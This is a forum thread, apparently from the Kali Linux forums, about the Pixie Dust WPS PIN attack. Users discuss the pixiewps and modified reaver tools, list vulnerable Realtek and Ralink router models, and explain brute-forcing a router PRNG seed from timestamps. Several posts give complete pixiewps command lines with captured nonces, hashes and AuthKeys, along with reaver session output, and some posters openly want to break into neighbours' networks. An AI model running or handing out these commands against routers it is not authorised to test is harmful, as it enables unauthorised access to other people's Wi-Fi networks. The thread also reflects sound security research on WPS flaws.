Originally Posted by wiire
Is there any chance this to work on TP-LINK in the future ?
TP-LINK like this http://www.maytinhviettrung.com/1_ht...TL-WR740ND.jpg
Junior Member
Is there any chance this to work on TP-LINK in the future ?
TP-LINK like this http://www.maytinhviettrung.com/1_ht...TL-WR740ND.jpg
Senior Member
aye congrats wiire!! https://bugs.kali.org/view.php?id=2203
Kali Linux USB Installation using LinuxLive USB Creator
Howto Install HDD Kali on a USB Key
Clean your laptop fan | basic knowledge
Junior Member
I can't install pixiewps. I get this error when I type "make" in its src directory.
gcc -o pixiewps pixiewps.c -lssl -lcrypto -Wall -Werror
pixiewps.c:33:26: fatal error: openssl/hmac.h: No such file or directory
compilation terminated.
make: * [all] Error 1
Senior Member
did you install the development libraries for openssl?
Cheers
Senior Member
I doubt it... As far as I remeber, TL-WR740n uses an Atheros chipset-- Runs Linux-- not feasible with the PRNG keyspace
Member
Finally able to create my account in this forum
I already emailed the wiire on the tests I've done.
First of all I made a modified version of reaver to facilitate the tests, this modification is already do a pixie test when a pin is tested on reaver
[P] E-Nonce: 41: f2: 8c: 82: 53: 3b: df: ........
[P] PKE: 6b: 0e: 22: cb: cd: 21: ........
[P] WPS Manufacturer: Ralink Technology, Corp.
[P] WPS Model Number: RT2860
[+] Received message M1
[P] AuthKey: f7: fb: bc: 21: ab: 3b: 99: 70: 36: 8e: f1: a0: ........
[+] Sending message M2
[P] E-Hash1: 1e: d6: 12: 27: 8f: 12: 28: 21: 9a: 54: .........
[P] E-Hash2: d: f: 34: and: ac: 55: a4: 9e: b3: 95: 31: 7a: 61: b0: ........
[Pixie-Dust]
[Pixie-Dust][*] ES-1: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00
[Pixie-Dust][*] ES-2: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00
[Pixie Dust-][*] PSK1: 76: 46: 96: c7: 5d: e4: 8a: 86: .......
[Pixie-Dust][*] PSK2: 1b: 5e: 3e: 6b: 19: 89: 4b: 5c: .......
[Pixie-Dust] [+] WPS pin: 41368541
[Pixie-Dust]
[Pixie-Dust][*] Time taken: 0 s
[Pixie-Dust]
[+] Received message M3
[+] Sending message M4
If someone want this version, tell me
Now with relation to the TP-Link.
I believe it may be vulnerable to another type of problem.
I have a TP-Link 740N v1, is a very old router, think it 2004-2005
It has the Atheros chipset, Linux runs and uses the hostap together with the / dev / random.
But this firmware version for example has a problem in the generation of random numbers, it may be that this firmware version is with this problem.
The seed for generating the random number is based on the date (date, time, seconds) router
Every time I restart the modem, the seed to generate the random number is the same. So it is possible to make bruteforce on all dates, hours, seconds to find the current state of the seed. This makes it possible to generate future seeds to make bruteforce the pin.
It may be that this problem is only in this firmware version, do not have other routers to test or compare and without having them in the hands is difficult to make the tests.
But this problem certainly is present in many other models of routers.
Today I met a router where the E-Hash1 and the E-Hash2 was identical and there needed to make a modification in pixie for him to do the bruteforce correctly.
I will continue to develop and when I have more news come back to post.
Sorry for the English, I used a translator
Junior Member
If you can do this brute-force attack in the fiture to work on tp-link 740n it will be awesome because 95% of networks around me are tp-link 740n with turned on WPS.
Junior Member
i have the same problem!~If you can do this brute-force attack in the fiture to work on tp-link 740n it will be awesome because 95% of networks around me are tp-link 740n with turned on WPS.
http://www44.zippyshare.com/v/aEY5Jq61/file.html
Senior Member
Someone I am working with has also found an AP where E-Hash1 = E-Hash2. I speak a little Spanish and the other guy speaks it fluently... I guess you do too? Anyways, if you could e-mail me that would be great. My e-mail is my user name @gmail.com
Thanks!
Junior Member
Hi,
Please, I'm trying to test Ralink RT2860 but it constanly gives me a error "wps transaction failed (0x04)" and I can't get m3 or m4 messages.
How can I get e-hashes out of this?
Junior Member
Hello,
I'm trying to test Ralink RT2860 (exactly same as the example above) but it constantly gives me an error "WPS transaction failed (0x04)" and I can't get any m3, m4 messages or e-hashes. Please, any solutions?
Last edited by whitetsagan; 2016-04-13 at 08:55.
Senior Member
tp-link is atheros addict but 4 models of TP-Link AP have at least one version with ralink chipset and this ones may probably be affected.(one was reported as but we never got the datas)
this are the models that are suspects :
TP-LINK TD-W8901N v1 TE7TDW8901NV1 bgn RT63365E 2 MiB 8 MiB RT5390
TP-LINK TD-W8951ND v5 TE7TDW8951NDV5 bgn RT63365E 2 MiB 8 MiB RT5390R
TP-LINK TD-W8961NB v3.0 bgn RT63365E 2 MiB 8 MiB
TP-LINK TD-W8961ND v3.x TE7TDW8961NDV3 bgn RT63365E 64 MiB
TP-LINK TD-W8968 v2 TE7TDW8968V2 bgn RT63365E 8 MiB 64 MiB
Member
Vendor: TP-LINKtp-link is atheros addict but 4 models of TP-Link AP have at least one version with ralink chipset and this ones may probably be affected.(one was reported as but we never got the datas
Model: TD-W8951ND
Firmware: 3.0.1 Build 110720 Rel.40612
Chipset: Ralink (RT2860)
Confirmed vulnerable.
Junior Member
Have tested the following routers with these results : " WPS pin not found! "
1. WPS Manufacturer: D-Link
WPS Model Number: DIR-615
2. WPS Manufacturer: ASUSTeK Computer Inc.
WPS Model Number: RT-N12
3. WPS Manufacturer: TP-LINK
WPS Model Number: 1.0
Junior Member
Also D-Link DIR-501
Junior Member
I'm interested in your modified reaver version. Does it also test the pin to get the actual paraphrase as well?
Member
Pixiewps 1.0.5 is out!
Added a partial implementation of a new attack!
Vulnerable devices: Realtek (ES-1 = ES-2 = Enrollee nonce). This attack doesn't always work. Also be sure not to use --dh-small with this one! Get the PKR from Wireshark and supply the Enrollee Nonce. Test and report!
Thanks to Dominique Bongard (again) and also to soxrok2212.
Bongard tweet: https://twitter.com/Reversity/status/586610963354357762
Rand function to implement: https://github.com/skristiansson/uCl...lib/random_r.c
Member
I do not have a much larger practical interest in this attack vector other than as POC; and probably won't spend a ton of time testing it out or using it. but this is still some really nice work! Kudos
Member
Here is my contribution
https://forums.kali.org/showthread.p...ie-Dust-Attack
Last edited by t6_x; 2015-04-13 at 23:23.
Junior Member
I have TP-LINK TD-W8961ND with the same Chipset Ralink (RT2860) but when i tryed Reaver to get the infos it always get stock at M2 is there a solution please
Junior Member
pixie is not installing.
it says
gcc -o pixiewps pixiewps.c -lssl -lcrypto -Wall -Werror
pixiewps.c:46:26: fatal error: openssl/hmac.h: No such file or directory
compilation terminated.
make: *** [all] Error 1
even libssl-dev isnt installing. its searching for 1.0.1e-2+deb7u12 but the repository has 1.0.1e-2+deb7u16.
what to do..???
Senior Member
Try this command: gcc -o pixiewps pixiewps.c -lssl -lcryptopixie is not installing.
it says
gcc -o pixiewps pixiewps.c -lssl -lcrypto -Wall -Werror
pixiewps.c:46:26: fatal error: openssl/hmac.h: No such file or directory
compilation terminated.
make: *** [all] Error 1
even libssl-dev isnt installing. its searching for 1.0.1e-2+deb7u12 but the repository has 1.0.1e-2+deb7u16.
what to do..???
Junior Member
Still No Help
it also givees the same error.
libssl-dev isnt installing,may be it is causing the problem but i can not get this evn after apt-get update.
Senior Member
The position of the reaver wpc files when using these modded reaver programs is now:
/usr/local/etc/reaver/
Files names are the 12digit mac address(no colons) of the target followed by .wpc
Any unfinished work previously done with the stock version must be copied or moved from the /etc/reaver/ folder to the /usr/local/etc/reaver/ folder. To confirm file position use the following command in the terminal window.
locate "*.wpc"
MTeams
Last edited by mmusket33; 2015-04-27 at 03:31.
Junior Member
this thing is wicked, thank you so much. it makes wifi testing so much quicker but I'll forget all the commands. oh well, who needs typing when you have script.
Junior Member
with this give me always pin not found!!!
Theres any solution?
Senior Member
To: FrostElrick
Try this:
Copy the following data between the #### to a text file with leafpad in root and name the file sources.list
################
#placed in /etc/apt/ folder
deb http://http.kali.org/kali kali main contrib non-free
deb-src http://http.kali.org/kali kali main contrib non-free
deb http://security.kali.org/kali-security kali/updates main contrib non-free
deb-src http://security.kali.org/kali-security kali/updates main contrib non-free
deb http://http.kali.org /kali main contrib non-free
deb http://http.kali.org /wheezy main contrib non-free
################
Go to the /etc/apt folder and rename the existing sources.list file to sources.list.orig
ie sources.list.original
Now copy the sources.list file in root to the etc/apt folder
Get an internet connection open a terminal window and
sudo apt-get install libssl-dev
sudo apt-get install libpcap-dev
sudo apt-get install libsqlite3-dev
Now install your modded reaver and pixiewps
Now go to your /etc/apt folder and erase your sources.list then rename sources.list.orig back to sources.list
Musket Teams
Last edited by mmusket33; 2015-04-28 at 00:49.
Senior Member
You could try using FrankenScript to download it and set it up, you can then browse the setup output in the frankenscript window by scrolling back.
If you still get an error then I'd guess your kali installation is broken in some way.
Member
Pixiewps 1.1 is out!
Download: GitHub
What's new:
- The previous attack now is fully implemented
- AuthKey computation if --dh-small is specified (also in Reaver). The data can be gathered from a .cap file (manually)
- Better input parsing with parameters length check
- More user friendly. Added some examples of use in the usage screen.
NOTE:
- In this version the computer/machine time you're running pixiewps on is IMPORTANT. Be sure it's set to the right date and time
- Althought now pixiewps can be run without a modded version of Reaver (using --dh-small), the modded version made by t6_x and datahead is still recommended
The (almost) full bruteforce for the new attack is performed using the option -f (--force). I say almost because it starts bruteforcing around the current machine time and goes backwards.
What is not implemented yet but may come in (a not near) future (so don't ask
- Multithreading (I tried to do a 'quick and dirty' implementation but it did more harm than good)
- Read all data needed from a .cap (always with --dh-small)
Below an example of AuthKey computation:
Last edited by wiire; 2015-05-01 at 19:43. Reason: Fixed some typos
Senior Member
@wiire all always SUPER thanks!!
Junior Member
Thanks for the new update, but it starts to get confusing with all these arguments nowcan we get a small tutorial ?
Senior Member
Cant wait to try this new version. I will report back soon.
Junior Member
https://github.com/t6x/reaver-wps-fork-t6x/issues/11
Cheers
Extra
Last edited by Extradry; 2015-05-02 at 01:30.
Member
soo... this works for Atheros now?
Senior Member
What a beautiful Saturday midday!
Sun is shining, day off and this magnificent version 1.1 is out!
Great job wiire!
So i can confirm that all devices from rtl819x projects are vulnerable if their firmware is based on Realtek SDK (But why wouldn't it be based on the tool designed and provided by realteck to create them?)
To make it a litlle hard for pixiewps and to really fully try this new -f option ( brute force on seed with time backwarding) i reset my realteck device to factory default ( first build time in 2012)
In a cheap laptop with poor microprocessor (around 600 key/sec with aircrack-ng ).
you should read back wiire posts in this tread
that's just three more arguments ( i think )
Basicaly if your router has a realtek chipset and you don't get the PIN using pixiewps 1.0 (or using pixiewps 1.1 without the hew features) it wil work with the new pixiewps 1.1 using .f argument
notice the possibility to compute the authkey form *.cap file that allows you to make a full "offline attack" just by grabbing the required strings in your M packets. (small dh key option , -S, has to be used with reaver and pixiedust)
Last edited by kcdtv; 2015-05-02 at 10:44.
Member
@kcdtv
You should try using -v 3. It prints the seed (Unix datetime) into human readable date and time.
Also I've been told there a routers that after failing retrieving the right date and time from the Internet, reset it to 0 (1st January 1970).
Any problems compiling on Ubuntu at all?
@wn722
I'm afraid that Atheros and Marvell will remain unbreakable.
As a side note Atheros hired Jouni Malinen the creator of hostapd in 2008 and in 2011 was bought by Marvell. Read it from Wikipedia.
Senior Member
No problems at all in Ubuntu & Xubuntu
Sweet!You should try using -v 3. It prints the seed (Unix datetime) into human readable date and time.
lolAlso I've been told there a routers that after failing retrieving the right date and time from the Internet, reset it to 0 (1st January 1970).
I can tell you that is not the case with rtl8192x based routers (i have alfa AIP-W525H and totolink NR301RT) that have been using for years... the farest they go back to is last build... both of mine are form 2012 and checking and i think, nut i may be wrong that we shouldn't have to go more backward than that date that appear in probes WPS : EV-2010-09-20 as i have the same for both routers which are form different month, it seems to be a genric base date time ..
this guys from atheros know who they hire! For sure we won't get es-1=es-2=0 with somobody like this beyond the code XDAs a side note Atheros hired Jouni Malinen the creator of hostapd in 2008 and in 2011
Member
I think soxrok is going to upload a new tutorial. There are some examples at the bottom of the usage screen. But basically what you want to do normally is launching pixiewps without --force. Then if the pin is not found and pixiewps prints a warning saying that the router might be vulnerable, then you may wanna try with --force. What pixiewps does is using the current time and date as reference and going backwards trying to recover the seed because the router time and date might be not right (like set at factory time).Thanks for the new update, but it starts to get confusing with all these arguments now
Also I set the default verbosity level to 2 but you may probably want to set it to 3.
Member
Yes sorry I should've clarified. The --force option is used only for what I call mode 4 which is Realtek 's PRNG seed bruteforce. I was planning on adding modes selection but I didn't and I left those modes on the usage screen and I didn't want to explicitly refer to vendors in the program.
The best practice is to run the program without -f and if you get a warning saying that the router might be vulnerable to mode 4 it means that you may want to try again with -f or with another set of data that could lead you (mode 2) secret nonces = enrollee nonce. I also refer to modes because that's how the program runs internally: it tries for every possible vulnerability. When it bruteforce the new PRNG though (that is mode 4) it tests normally for a small window of time (approximately 10 days) because the new bruteforce is more consuming power.
So --force is basically used only if the router has set its time to past (more than 10 days ago). To exhaust it probably takes 20 - 30 mins. Also -f doesn't take any argument. The program just doesn't complain if you pass it some extra arguments. I gotta fix that.
Also would you mind replying on the pixiewps thread for program related questions? Thanks.
Thank you very much for clarifying Wiire.
Junior Member
Hello , @Wiire @Kcdtv
Chipset : Realtek RTL8671
Computer : Test computer, proccessor 1.9 Ghz 1GB Ram .. ( 800 key/sec )
Command : pixiewps -e -r -s -z -a -n -f
I m waiting for 3 hours
What can I do ? Suggestion?
a ) Give up
b) Continiou , No risk no fun
Senior Member
We have more or less the same power (i sayed 600 but it can go to 800 when it goes full power) and to go back until 2012 it took more than 15 minutes...
But wire has been told that some realteck chipset could go back until 1970
so if you can leave it that would be great.
This chipset could be the one... it is not form the X project serie, so it has good chance.
Thinking about pixiewps maybe it would be a good idea to have just one try with seed 1970 at the begining of the brutee force and then start the brute force backward
I was also thinking about an option that allows to define a point in time.
Let's say i choose 01-01-2012 00:00
Then the brute force would lstart from the defined time to day time and if the PIN is not found it would go from 01-01-2012 00:01 to 1970 (like to sequences)
that maybe a bit weird and strange but i thought it may be intersiting
cheers
Member
Yes now that pixiewps 1.1 is out we can collect data and decide how to optimize it best in a future release. As I said I run it on my desktop PC which takes only 20 minutes to exaust the keyspace so... yeah...
If some of you get:
"[!] The AP /might be/ vulnerable to mode 4. Try again with --force or with another (newer) set of data."
But doesn't find the pin after the --force bruteforce (and your computer time is ok) let me know. I assumed that the router cannot have set time to future but... you never know...
Member
3 hours...?Hello , @Wiire @Kcdtv
Chipset : Realtek RTL8671
Computer : Test computer, proccessor 1.9 Ghz 1GB Ram .. ( 800 key/sec )
Command : pixiewps -e -r -s -z -a -n -f
I m waiting for 3 hours
What can I do ? Suggestion?
a ) Give up
b) Continiou , No risk no fun
I can give it a go if you want. It takes at most 20 minutes on my PC. Send me your data via email or post it here. Of course I assume the router you're testing is yours.
Junior Member
Hello Wiire,
Test Finished ... I m not lucky..
Reaver Results:
Pixiewps Results:Code:Associated with 90:F6:52:xX:xX:BX (ESSID: x) [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000 [+] Trying pin 12345670. [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response [P] E-Nonce: 00:00:42:b4:00:00:6a:2e:00:00:07:80:00:00:43:45 [P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b [P] WPS Manufacturer: Realtek Semiconductor Corp. [P] WPS Model Name: RTL8671 [P] WPS Model Number: EV-2006-07-27 [P] Access Point Serial Number: 123456789012347 [+] Received M1 message [P] R-Nonce: ec:c4:f2:77:36:3c:fe:00:60:13:b8:2d:bc:ba:68:82 [P] PKR: d7:16:e1:10:56:09:4f:97:da:f3:85:7e:72:61:b5:53:4e:e9:f0:80:85:06:7f:48:03:6b:69:07:60:aa:5d:ea:e4:48:3d:ba:47:2d:38:8e:f6:d9:b0:13:3a:c4:52:af:90:ef:10:cd:e0:15:84:5b:d7:38:f7:37:cc:2b:56:81:05:7a:d8:d2:6d:2e:8e:fb:d9:bb:05:7b:6e:c9:72:1f:f3:46:45:83:3f:f3:80:fc:bb:b1:c0:e4:25:01:17:25:06:0b:cf:2e:8b:8b:2a:d1:7f:fd:f9:a6:b4:b8:f4:aa:6b:09:78:24:4c:dd:31:20:ca:66:2f:ee:81:ff:4e:1b:e8:cf:a6:83:67:59:f3:d3:04:63:07:05:bd:2e:85:06:13:7e:60:83:a9:95:96:17:46:a4:e3:d3:6e:c6:8c:9f:bd:73:6c:cb:84:65:cd:b7:b2:40:4f:be:61:7f:5c:a7:d7:53:d9:19:31:59:66:19:69:0b:67:f3:9e:04:88:73 [P] AuthKey: ed:55:d2:0e:e3:f4:93:89:ab:80:b0:71:21:3f:1b:6f:2c:db:1a:8e:43:ad:f7:da:d2:e2:9f:ba:fe:81:e6:8a [+] Sending M2 message [P] E-Hash1: 3b:a6:4b:08:ef:72:22:75:c5:67:0e:ad:92:a2:c7:c2:69:05:f0:a0:26:76:10:96:56:a4:b7:bb:1d:b9:bf:6c [P] E-Hash2: f1:59:02:d1:34:5f:1e:95:0e:e3:9f:90:50:f8:12:00:18:e9:ec:d4:2f:f5:fc:fb:0b:37:0a:1b:6b:14:34:be [Pixie-Dust] [Pixie-Dust] Pixiewps 1.1 [Pixie-Dust] [Pixie-Dust] [-] WPS pin not found! [Pixie-Dust] [Pixie-Dust][*] Time taken: 13 s [Pixie-Dust] [Pixie-Dust] [!] The AP /might be/ vulnerable to mode 4. Try again with --force or with another (newer) set of data. [Pixie-Dust]
Pin:12345670Code:pixiewps -f -e d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b -r d7:16:e1:10:56:09:4f:97:da:f3:85:7e:72:61:b5:53:4e:e9:f0:80:85:06:7f:48:03:6b:69:07:60:aa:5d:ea:e4:48:3d:ba:47:2d:38:8e:f6:d9:b0:13:3a:c4:52:af:90:ef:10:cd:e0:15:84:5b:d7:38:f7:37:cc:2b:56:81:05:7a:d8:d2:6d:2e:8e:fb:d9:bb:05:7b:6e:c9:72:1f:f3:46:45:83:3f:f3:80:fc:bb:b1:c0:e4:25:01:17:25:06:0b:cf:2e:8b:8b:2a:d1:7f:fd:f9:a6:b4:b8:f4:aa:6b:09:78:24:4c:dd:31:20:ca:66:2f:ee:81:ff:4e:1b:e8:cf:a6:83:67:59:f3:d3:04:63:07:05:bd:2e:85:06:13:7e:60:83:a9:95:96:17:46:a4:e3:d3:6e:c6:8c:9f:bd:73:6c:cb:84:65:cd:b7:b2:40:4f:be:61:7f:5c:a7:d7:53:d9:19:31:59:66:19:69:0b:67:f3:9e:04:88:73 -s 3b:a6:4b:08:ef:72:22:75:c5:67:0e:ad:92:a2:c7:c2:69:05:f0:a0:26:76:10:96:56:a4:b7:bb:1d:b9:bf:6c -z f1:59:02:d1:34:5f:1e:95:0e:e3:9f:90:50:f8:12:00:18:e9:ec:d4:2f:f5:fc:fb:0b:37:0a:1b:6b:14:34:be -a ed:55:d2:0e:e3:f4:93:89:ab:80:b0:71:21:3f:1b:6f:2c:db:1a:8e:43:ad:f7:da:d2:e2:9f:ba:fe:81:e6:8a -n 00:00:42:b4:00:00:6a:2e:00:00:07:80:00:00:43:45 Pixiewps 1.1 [-] WPS pin not found! [*] Time taken: 27220 s
Last edited by Saydamination; 2015-05-16 at 21:08. Reason: Add pin
Member
There's something utterly strange in that nonce. Try to capture a session with Wireshark and see if it matches the nonce reaver prints you.Hello Wiire,
Test Finished ... I m not lucky..
Code:[P] E-Nonce: 00:00:42:b4:00:00:6a:2e:00:00:07:80:00:00:43:45
Junior Member
Dear Wiire,
i am not getting error : Pixiewps not getting Hash File
I only get E-Nounce PKE R-Nounce PKR and AUthkey only no hash
please guide me further guidance so that i can crack pins and passphrase
Thanks in advance
jenisbob
Junior Member
hello @Kcdtv and Wiire ,
Many thanks for comment and suggestion... you're absolutely right...Your idea is great about option..
I m really wondering what would happen it ... So I wanna wait until ending test
I will turn back with test results..
Cheers..
Last edited by Saydamination; 2015-05-02 at 15:42. Reason: Add Ok..
Junior Member
You are right Wiıre.. This router is different .. I Think there is some protect ..
I will try other options...
This is Wireshark screen:
http://imgur.com/IkpSn7C
Junior Member
Code:root@bt:~# pixiewps -e d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b -r 8c:da:44:e4:bf:e5:e4:a5:72:1e:c2:8e:8e:a4:c9:1f:28:16:95:f3:b8:fd:2c:9a:ad:5d:27:51:38:25:5d:cf:1f:25:35:65:99:f5:a3:1f:bc:c2:ff:59:45:3f:8d:a6:9a:72:c6:9d:1c:de:c9:2f:5e:e4:4f:f4:7a:7c:53:50:c7:da:d4:50:37:b5:a0:1d:bb:8c:a5:35:fc:b5:cd:2b:22:3b:5e:2e:23:51:10:bc:8e:7e:c3:bd:65:3d:35:dd:5c:c6:83:ef:69:0d:6d:e7:d7:b2:e1:98:c7:53:0b:50:ce:3a:dd:66:42:6b:0f:34:50:13:f1:71:0e:3c:f1:ab:a6:0d:23:22:08:f5:b1:7c:b2:dd:c5:b6:91:c6:fe:d6:ca:fe:e0:7b:ed:22:90:3c:06:d3:9c:ae:b7:77:79:ca:2a:cc:42:ac:3f:07:0b:73:69:31:7c:f9:69:ea:24:69:d1:4e:f3:b1:cf:bb:22:76:60:3f:11:8a:91:46:ba:a7 -s 2c:ed:7a:66:54:84:55:80:ae:28:52:78:7a:bb:41:a8:37:42:bf:fc:cf:2e:cd:4d:53:86:06:0c:0b:79:85:19 -z 8a:d4:8e:83:e0:00:34:99:78:c5:2b:92:11:ff:f6:ae:18:1f:15:1a:da:f7:5d:41:44:8f:ef:00:26:75:38:0a -a db:a5:68:39:87:53:fa:7a:1c:2a:ce:3f:f9:c8:5d:de:8b:63:e8:c6:b8:97:18:04:30:3a:90:7a:1f:aa:20:80 -n 45:7b:18:6c:14:80:7e:17:7f:d6:22:84:43:74:49:ad -f Pixiewps 1.1 [-] WPS pin not found! [*] Time taken: 16902 s root@bt:~#
Last edited by Saydamination; 2015-05-04 at 19:18.
Member
apparently you are too far from the router to communicate properly with him
Try to get closer to the router.
Posting Permissions
